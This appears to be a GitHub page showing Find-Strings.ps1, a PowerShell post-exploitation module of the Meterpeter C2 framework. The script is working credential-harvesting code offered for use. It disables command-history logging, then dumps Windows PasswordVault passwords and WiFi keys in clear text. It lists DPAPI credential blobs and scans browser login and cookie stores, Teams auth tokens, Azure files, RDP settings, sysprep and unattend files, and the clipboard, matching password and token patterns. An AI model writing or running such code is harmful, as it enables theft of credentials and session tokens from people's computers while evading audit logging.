-
Notifications
You must be signed in to change notification settings - Fork 53
/
Find-Strings.ps1
594 lines (509 loc) · 21.6 KB
/
Find-Strings.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
<#
.SYNOPSIS
Search for Strings\Regex inside files
Author: @r00t-3xp10it (ssa redteam)
Tested Under: Windows 10 (19044) x64 bits
Required Dependencies: none
Optional Dependencies: VaultSvc, VaultCmd
PS cmdlet Dev version: v1.1.23
.DESCRIPTION
Auxiliary module of Meterpeter C2 that searchs for matching
strings inside files recursive starting in input directory.
.NOTES
Cmdlet displays the LineNumber where the strings have been found.
Param -verb does not display file content if bigger than 300 lines.
Param -Exclude '.txt' will add one more exclusion to the default list.
Param -AllPossible switch increases the default cmdlet Regex scan success
rate, but it also increases the probability of encounter false positives.
Use | (pipe) command to split Strings\Regex (example: .txt|.ini|.bat).
Regex examples:
Cmdlet by default limmit the string to capture to 22 chars length but
that can be changed by invoking -StrLength parameter to defined length.
-StrLength value reffers to: "password"="STRING-TO-CAPTURE-MAX-LENGTH"
Regex examples:
Only grab passwords with 22 chars max length
(^(\s+p|\s+cp|cp|p)ass.{0,6}(=|:).{0,22}$)
.Parameter Path
The directory where to start search recursive (default: $Env:USERPROFILE)
.Parameter String
String or Regex (regex: ^(\s+U|U)ser.{0,6}(=|:)|^(\s+p|\s+cp|cp|p)ass.{0,6}(=|:)|login.{0,2}(=|:))
.Parameter Exclude
File extension to exclude (example: .zip|.tar|.rar|.7z|.pdf|.img|.iso|.dll|.db|.mp(3|4)|.png|.jpg)
.Parameter StrLength
The string to capture max length in chars (default: 22)
.Parameter StopAt
Stop searching after found xxx results (default: 100)
.Parameter AllPossible
Increase default Regex success rate? (less accurate)
.Parameter Verb
Switch to diplay the suspicious file contents? (verbose)
.Parameter Limmit
Print file contents if less than xxx lines (default: 300)
.EXAMPLE
PS C:\> .\Find-strings.ps1 -Path "$Env:USERPROFILE" -String "[^$]password="
Search for string 'password=' on %userprofile% files recursive
.EXAMPLE
PS C:\> .\Find-strings.ps1 -Path "$Env:TMP" -String "pass=|passwd=|password="
Search for string 'pass= passwd= password=' on %temp% files recursive
.EXAMPLE
PS C:\> .\Find-strings.ps1 -Path "$Env:USERPROFILE" -String "passw=" -Exclude ".txt"
Search for string 'passw=' on %userprofile% files (without .txt extension) recursive.
.EXAMPLE
PS C:\> .\Find-strings.ps1 -Path "$Env:TMP" -String "User.{0,4}(=|:)|passw.{0,3}(=|:)"
Strings 'passw=,passw:,passwo=,passwor=,password=,user=,usern=,userna=,usernam=,username='
.EXAMPLE
PS C:\> .\Find-strings.ps1 -Path "$Env:TMP" -String "(`"password`":.{0,22})$" -stopAt "10"
Search for 10 strings max with "password":+{0 to 22 chars} recursive starting in %tmp% dir
.EXAMPLE
PS C:\> .\Find-strings.ps1 -Path "$Env:TMP" -stopAt "10" -limmit "30000" -verb
Stop after found 10 results and print onscreen file contents until 30.000 lines
.EXAMPLE
PS C:\> .\Find-strings.ps1 -Path "$Env:TMP" -AllPossible
Increase default Regex scan success rate (less accurate)
.INPUTS
None. You cannot pipe objects into Find-string.ps1
.OUTPUTS
* Find strings inside files
=> Total of files to scan: [19]
TokenId : [[1]]
FileName : creds.txt
FullPath : C:\Users\pedro\AppData\Local\Temp\creds.txt
StringMatch : user=pedroUbuntu password=r00t3xp10it
LineNumber : 10
TokenId : [[2]]
FileName : logins.log
FullPath : C:\Users\pedro\AppData\Local\Temp\logins.log
StringMatch : UserName: Teams passw = r00tPassWd
LineNumber : 2 4
Scan compleated in '00:00:01' time length.
.LINK
https://github.com/r00t-3xp10it/meterpeter
https://regexone.com/lesson/introduction_abcs
https://towardsdatascience.com/regular-expressions-clearly-explained-with-examples-822d76b037b4
#>
[CmdletBinding(PositionalBinding=$false)] param(
[string]$String="(^(\s+U|U)ser.{0,6}(=|:).[^$]{0,22}$)|(^(\s+p|\s+cp|cp|p)ass.{0,6}(=|:).{0,22}$)|(^(\s+p|p)wd.{0,2}(=|:).{0,22}$)|(log(i|o)n.{0,2}(=|:).[^$]{0,22}$)",
[string]$Exclude=".zip|.tar|.rar|.7z|.pdf|.img|.iso|.dll|.db|.mp(3|4)|.png|.jpg|.gif|.msi|.exe|.wav|.avi|.ttf|.otf",
[string]$Path="$Env:USERPROFILE",
[switch]$AllPossible,
[int]$StrLength='22',
[int]$StopAt='100',
[int]$Limmit='300',
[switch]$Verb
)
$CmdletVersion = "v1.1.23"
$ScanStartTimer = (Get-Date)
$ErrorActionPreference = "SilentlyContinue"
#Disable Powershell Command Logging for current session.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
$host.UI.RawUI.WindowTitle = "@Find-String $CmdletVersion {SSA@RedTeam}"
## Make sure input dir exists
If(-not(Test-Path -Path "$Path"))
{
write-host "`n Error: cmdlet cant find the input directory.`n" -ForegroundColor Red
return
}
## Scanning root directory its forbiden
If($Path -iMatch '(^(C(:|:\\))$|^(C:\\Window(s|s\\))$)')
{
write-host "`n Error: cmdlet cant scan input directory root." -ForegroundColor Red
write-host " Try again or go further down in the diretory tree`n" -ForegroundColor Red
return
}
## Make sure user input (-exclude) does not match any extensions in default list
If($Exclude -iNotMatch ".zip|.tar|.rar|.7z|.pdf|.img|.iso|.dll|.db|.mp(3|4)|.png|.jpg|.gif|.msi|.exe|.wav|.avi|.ttf|.otf")
{
## check if user inputed command
# it starts with a pipe (|) char
If($Exclude -NotMatch '^(\|)')
{
## Add Pipe to user input string
$Exclude = "|"+"$Exclude" -join ''
}
## Adding one more extension exclusion to cmdlet default exclusion list
$Exclude = ".zip|.tar|.rar|.7z|.pdf|.img|.iso|.dll|.db|.mp(3|4)|.png|.jpg|.gif|.msi|.exe|.wav|.avi|.ttf|.otf"+"$Exclude" -join ''
}
If($Path -iMatch '^(C:\\Windows\\.)')
{
## System directory exclusions groups
# This will reduce system directorys scan time
$Exclude = "$Exclude"+"|.NLS|.table|.scr|.msc|.cpl|.cat|.cab|.mui|.evtx|.efi|.tlb|.blb" -join ''
}
## Store all file names fullpaths found (recursive search)
write-host "`n* Find strings inside files" -ForegroundColor Green
$Exclude = "$Exclude"+"|.SC2Replay|.SC2Save|Battle.net|Games|GameLogs" -join ''
$FileNames = (Get-ChildItem -Path "$Path" -Recurse -EA SilentlyContinue | Where-Object {
$_.PsIsContainer -NotMatch '^(True)$' -and $_.Name -iNotMatch "($Exclude)"
}).FullName
## Count how many files have been found inside dir
$FilesCounter = (echo $FileNames|Measure-Object).Count
## Check if string match the cmdlet default string in the end.
If($String -Match '(0\)n\.\{0,2\}\(=|:\)\.\[\^\$\]\{0,22\}\$\))$')
{
## Add new groups to default string because meterpeter C2 cant
# escape the backticks [`] that are escaping the double quotes ["] in this Regex
$String = "$String" + "|((cp|p)ass.{0,4}`":.{0,22}$)|(^Password(\s+:|:))|(`"(Pass.{0,5}|User.{0,4})`">)|(Username`":.{0,22}$)|((`"access|[^$]auth|[^$]auth_)token(\s*|\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=))" -join ''
}
If($AllPossible.IsPresent)
{
## This Regex Increases the scan success rate ...
# But it also increases the probability of encounter false positives.
$String = "(^(\s+U|U)ser.{0,4}(\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=).[^$]{0,150}$)|(^(\s+p|\s+cp|cp|p)ass.{0,4}(\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=).[^$])|(^(\s+p|p)wd(\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=).[^$]{0,150}$)|(log(i|o)n(\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=).[^$]{0,150}$)|(Username(\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=).{0,150}$)|(Password(\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=))|((`"access|[^$]auth|[^$]auth_)token(\s*|\s+`"|`"|`"+:|`"+>|\s+:|:|\s+=|=))"
}
Else
{
## Define string to capture max length (xx chars)
$String = $String -replace "0,22","0,${StrLength}"
}
$Creds = $null
## Verbose outputs (-verb)
If($Verb.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Display detail info + common creds
.OUTPUTS
Currently loaded vaults:
Vault: Credenciais Web
Vault Guid:4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Location: C:\Users\pedro\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Vault: Credenciais do Windows
Vault Guid:77BC582B-F0A6-4E15-4E80-61736B6F3B29
Location: C:\Users\pedro\AppData\Local\Microsoft\Vault
- [PasswordVault] None plain text credentials found.
WiFi credentials
SSID name : Vodafone-3522EB
Key Content : r00t3xp10it
SSID name : Pinho verde-2G
Key Content : pinhoverde2015
DPAPI master keys
78D8FB08F793E5AD42292B24ED3E4964
D3DA1BB8B5BFC56D5A4B45A6742DA77B
013F80D38C8D6E1BE9B8016C42A9BAF1
#>
## Print OnScreen detail information
write-host " => " -ForegroundColor DarkYellow -NoNewline
write-host "StartPath: '" -NoNewline
write-host "$Path" -ForegroundColor Magenta -NoNewline
write-host "'"
write-host " =>" -ForegroundColor DarkYellow -NoNewline
write-host " StrLength:" -NoNewline
write-host "$StrLength" -ForegroundColor DarkYellow -NoNewline
write-host "[chars] Limmit:" -NoNewline
write-host "$Limmit" -ForegroundColor DarkYellow -NoNewline
write-host "[lines] StopAfter:" -NoNewline
write-host "$StopAt" -ForegroundColor DarkYellow -NoNewline
write-host "[matches]"
## Check if user is using Regex
If($String -Match '(\^|\||{|})')
{
write-host " => " -ForegroundColor DarkYellow -NoNewline
write-host "Regex: " -NoNewline
write-host "($String)" -ForegroundColor Magenta
}
Else
{
write-host " => " -ForegroundColor DarkYellow -NoNewline
write-host "String: " -NoNewline
write-host "($String)" -ForegroundColor DarkYellow
}
## Dump Windows PasswordVault function
If((Get-Service -Name "VaultSvc").Status -Match '^(Running)$')
{
$ctt = (VaultCmd /list) -replace '^[^Curr]\s*',' '
If($ctt -iMatch '^(Currently loaded vaults:)$')
{
write-host ""
## Display Currently loaded vaults
echo $ctt|Select-Object -skipLast 1
}
## Retrieve Windows Vault credentials
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$PasswordVault = New-Object Windows.Security.Credentials.PasswordVault
## Check if we have any credentials to display
$CheckForCredentials = $PasswordVault.RetrieveAll()
If([string]::IsNullOrEmpty($CheckForCredentials))
{
write-host "`n - [PasswordVault] " -ForegroundColor Red -NoNewline
write-host "None plain text credentials found." -ForegroundColor DarkGray
}
Else
{
$VaultName = ($ctt|Select-String -Pattern "^(\s*Vault:\s*.*Web)")
$VaultAccessType = $VaultName -replace '^(\s*Vault: )',''
## Print OnScreen resource_names + credentials (in plain text) found.
$PasswordVault.RetrieveAll() | % { $_.RetrievePassword(); $_ } |
Select-Object -Property UserName,Resource,Password, @{Name='Vault';Expression={"$VaultAccessType"}} |
Format-Table -AutoSize | Out-String -Stream | Select-Object -SkipLast 2 | ForEach-Object {
$stringformat = If($_ -Match '^(UserName)')
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match '^----')
{
@{ 'ForegroundColor' = 'White' }
}
Else
{
@{ 'ForegroundColor' = 'Blue' }
}
Write-Host @stringformat $_
}
}
}
$Creds = @()
## Dump WiFi SSIDnames\Credentials function
#Special thanks to @ShantyDamayanti for reporting Select-String bug on ForEach()
$Profiles = $(netsh wlan show profiles|Select-String -Pattern "All User Profile")
$parsedata = $Profiles -replace 'Profiles on interface Wi-Fi:','' -replace '\s*All User Profile\s*: ',''
ForEach($Item in $parsedata)
{
$Creds += $(netsh wlan show profiles name=$Item key=clear|findstr "SSID Content"|findstr /V "Number")
}
If($Creds -ne $null)
{
## Display Key contents OnScreen
write-host "`n WiFi credentials" -ForegroundColor Green
$Creds -replace '"','' -replace '^(\s*)',' ' -replace ' :',' :' -replace ' :',' :'
}
## Dump DPAPI master keys function
$Dpapi1 = (Get-ChildItem -Path "$Env:APPDATA\Microsoft\Credentials" -Attributes Hidden -Force -EA SilentlyContinue).Name
$Dpapi2 = (Get-ChildItem -Path "$Env:LOCALAPPDATA\Microsoft\Credentials" -Attributes Hidden -Force -EA SilentlyContinue).Name
If($Dpapi1 -ne $null -or $Dpapi2 -ne $null)
{
## Formating dpapi keys outputs found
# so they can fit on cmdlet output style ^_^
write-host "`n DPAPI Blob keys" -ForegroundColor Green
$line1 = $Dpapi1[0];$key1 = " "+"$line1" -join ''
$line2 = $Dpapi1[1];$key2 = " "+"$line2" -join ''
$line3 = $Dpapi1[2];$key3 = " "+"$line3" -join ''
If($line1){echo $key1};If($line2){echo $key2};
If($line3){echo $key3}
## LOCALAPPDATA dpapi keys
$line4 = $Dpapi2[0];$key4 = " "+"$line4" -join ''
$line5 = $Dpapi2[1];$key5 = " "+"$line5" -join ''
$line6 = $Dpapi2[2];$key6 = " "+"$line6" -join ''
$line7 = $Dpapi2[3];$key7 = " "+"$line7" -join ''
$line8 = $Dpapi2[4];$key8 = " "+"$line8" -join ''
If($line4){echo $key4};If($line5){echo $key5};
If($line6){echo $key6};If($line7){echo $key7};
If($line8){echo $key8}
}
write-host ""
Start-Sleep -Milliseconds 1500
}
## Interesing files - scanner locations
# Microsoft EDGE logins file enumeration
$EdgeFile = (Gci -Path "$Env:LOCALAPPDATA\Microsoft\Edge\User Data"|?{$_.PSIsContainer -eq $false -and $_.Length -gt 0}).FullName
If(-not([string]::IsNullOrEmpty($EdgeFile)))
{
ForEach($EdgeData in $EdgeFile)
{
$FileNames += "$EdgeData"
$FilesCounter = $FilesCounter + 1
}
}
## Firefox logins file enumeration
$FireFile = (Gci -Path "$Env:APPDATA\Mozilla\Firefox\Profiles" -Recurse -Force|?{$_.PSIsContainer -eq $false -and $_.Name -iMatch '(logins.json)$'}).FullName
If(-not([string]::IsNullOrEmpty($FireFile)))
{
ForEach($FireData in $FireFile)
{
$FileNames += "$FireData"
$FilesCounter = $FilesCounter + 1
}
}
## Chrome logins file enumeration
$ChromeFile = (Gci -Path "$Env:LOCALAPPDATA\Google\Chrome\User Data\Default"|?{$_.PSIsContainer -eq $false -and $_.Name -iMatch '(Login+\s+Data|Cookies|Trust+\s+Tokens)'}).FullName
If(-not([string]::IsNullOrEmpty($ChromeFile)))
{
ForEach($ChromeData in $ChromeFile)
{
$FileNames += "$ChromeData"
$FilesCounter = $FilesCounter + 1
}
}
## Opera logins file enumeration
$OperaFile = (Gci -Path "$Env:LOCALAPPDATA\Programs\Opera*" -Recurse -Force|?{$_.PSIsContainer -eq $false -and $_.Name -iMatch '(installer_prefs.json)$'}).FullName
If(-not([string]::IsNullOrEmpty($OperaFile)))
{
ForEach($OperaData in $OperaFile)
{
$FileNames += "$OperaData"
$FilesCounter = $FilesCounter + 1
}
}
## Extra XML files locations
$XMLFiles = (Gci -Path "$Env:ALLUSERSPROFILE" -Recurse -Include 'Groups.xml','Services.xml','Scheduledtasks.xml','DataSources.xml','Printers.xml','Drives.xml','sites.xml' -Force).FullName
If(-not([string]::IsNullOrEmpty($XMLFiles)))
{
ForEach($XMLData in $XMLFiles)
{
$FileNames += "$XMLData"
$FilesCounter = $FilesCounter + 1
}
}
## Azure XML files location
$AzureFile = (Gci -Path "$Env:USERPROFILE\.azure" -Force|?{$_.PSIsContainer -eq $false -and $_.Name -iMatch '(.json)$'}).FullName
If(-not([string]::IsNullOrEmpty($AzureFile)))
{
ForEach($AzureData in $AzureFile)
{
$FileNames += "$AzureData"
$FilesCounter = $FilesCounter + 1
}
}
## Invoke-VaultCmd cmdlet leave entrys in this location
$VaultCmd = (Gci -Path "$Env:LOCALAPPDATA"|?{$_.Name -Match '(\s*_.{4}.(xml|secret))$'}).FullName
If(-not([string]::IsNullOrEmpty($VaultCmd)))
{
ForEach($Entry in $VaultCmd)
{
$FileNames += "$Entry"
$FilesCounter = $FilesCounter + 1
}
}
## RDP remote desktop credentials
If(Test-Path -Path "$Env:LOCALAPPDATA\Microsoft\Remote Desktop Connection Manager\RDCMan.settings")
{
$FileNames += "$Env:LOCALAPPDATA\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"
}
## Microsoft Teams clear text $Auth_Tokens capture
If(Test-Path -Path "$Env:APPDATA\Microsoft\Teams\Local Storage\leveldb")
{
$TeamsFile = (Gci -Path "$Env:APPDATA\Microsoft\Teams\Local Storage\leveldb"|?{$_.Length -ne 0}).FullName
ForEach($Entry in $TeamsFile)
{
$FileNames += "$Entry"
$FilesCounter = $FilesCounter + 1
}
}
If(Test-Path -Path "$Env:APPDATA\Microsoft\Teams\Cookies")
{
$FileNames += "$Env:APPDATA\Microsoft\Teams\Cookies"
$FilesCounter = $FilesCounter + 1
}
## Powershell commands history
$FileNames += "$Env:APPDATA\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt"
## IIS web server (web.config) credential dump
$FileNames += "$Env:WINDIR\Microsoft.NET\Framework64\v4.0.30319\Config\web.config"
## Append XML file paths to current paths list
$FileNames += "$Env:WINDIR\Panther\Unattend\Unattend.xml"
$FileNames += "$Env:WINDIR\system32\sysprep\sysprep.xml"
$FileNames += "$Env:WINDIR\system32\sysprep.inf"
$FileNames += "$Env:WINDIR\Panther\Unattend.xml"
$FileNames += "$Env:WINDIR\sysprep\sysprep.inf"
$FileNames += "$Env:WINDIR\sysprep\sysprep.xml"
If($Verb.IsPresent){Start-Sleep -Seconds 1}
$FilesCounter = $FilesCounter + 7
## Print OnScreen the number of files found
write-host " => " -ForegroundColor DarkYellow -NoNewline
write-host "Total of files to scan: [" -NoNewline
write-host "$FilesCounter" -ForegroundColor DarkYellow -NoNewline
write-host "]`n"
$DSetting = "false"
$i = 0 #Success counter
## Loop trougth all filenames
ForEach($Token in $FileNames)
{
## Search for strings or regex inside file
$MatchedString = (Get-Content -Path "$Token"|Select-String -Pattern "($String)" -EA SilentlyContinue)
If($MatchedString -iMatch "$String")
{
## Get filename description
$Description = (Get-ChildItem -Path "$Token"|Select-Object *)
If($Verb.IsPresent){$FileContents = Get-Content -Path "$Token"}
$Name = $Description.PSChildName
$Line = $MatchedString.LineNumber
$Full = $Description.FullName
$i = $i + 1
## Print results OnScreen
write-host "`n TokenId : [[" -NoNewline
write-host "$i" -ForegroundColor Blue -NoNewline
write-host "]]"
write-host " FileName : $Name"
write-host " FullPath : $Full"
write-host " StringMatch : " -NoNewline
write-host "$MatchedString" -ForegroundColor DarkGreen
write-host " LineNumber : " -NoNewline
write-host "$Line" -ForegroundColor DarkYellow
## Verbose outputs
If($Verb.IsPresent)
{
## Check file length limmit
If($Description.Length -lt $Limmit)
{
## verbose displays file contents
write-host " FileContents : `n"
echo $FileContents
}
Else
{
write-host " FileContents : "-NoNewline
write-host "[Limmit:$Limmit] "-NoNewline -ForegroundColor Yellow
write-host "Invoke a bigger -limmit to display file .." -ForegroundColor Red
}
}
write-host ""
If($i -eq $StopAt)
{
$DSetting = "true"
## Stop after xx good results helps
# in reducing the cmdlet scan time.
write-host "`n[" -NoNewline
write-host "$StopAt" -ForegroundColor Blue -NoNewline
write-host "] success results reached, abort .."
break
}
Start-Sleep -Milliseconds 600
}
Else
{
If($Verb.IsPresent)
{
If($Token -iMatch '(\\Edge\\User Data\\CrashpadMetrics-active.pma)$')
{
write-host "`n - Scanning diferent locations for credentials -" -ForeGroundColor Green
write-host " Default locations provided by Find-Strings`n" -ForeGroundColor DarkGray
Start-Sleep -Seconds 2
}
## Display files flagged as [clean]
write-host " ScanningFile : " -NoNewline
write-host "$Token" -ForeGroundColor Red -NoNewline
write-host " [clean]"
}
}
}
## ClipBoard Enrtys
$ClipEntrys = (Get-Clipboard -Raw)
If(-not([string]::IsNullOrEmpty($ClipEntrys)))
{
## Print results OnScreen
write-host "`n Application : ClipBoard"
write-host " StringCapture: " -NoNewline
write-host "$ClipEntrys" -ForegroundColor DarkGreen
}
## Scan timmer
Start-Sleep -Milliseconds 500
If($DSetting -eq "false"){write-host "`n"}
$ElapsTime = $(Get-Date) - $ScanStartTimer
$TotalTime = "{0:HH:mm:ss}" -f ([datetime]$ElapsTime.Ticks)
If($i -lt 1)
{
Write-Host " Scan compleated in '" -NoNewline
}
Else
{
Write-Host "Scan compleated [" -NoNewline
Write-Host "$i" -ForegroundColor Blue -NoNewline
Write-Host "] in '" -NoNewline
}
Write-Host "$TotalTime" -ForegroundColor Green -NoNewline
Write-Host "' time length."
If($i -lt 1)
{
write-host " Scan results : " -NoNewline
write-host "fail to find any strings inside current directory.`n" -ForegroundColor Red
}
write-host ""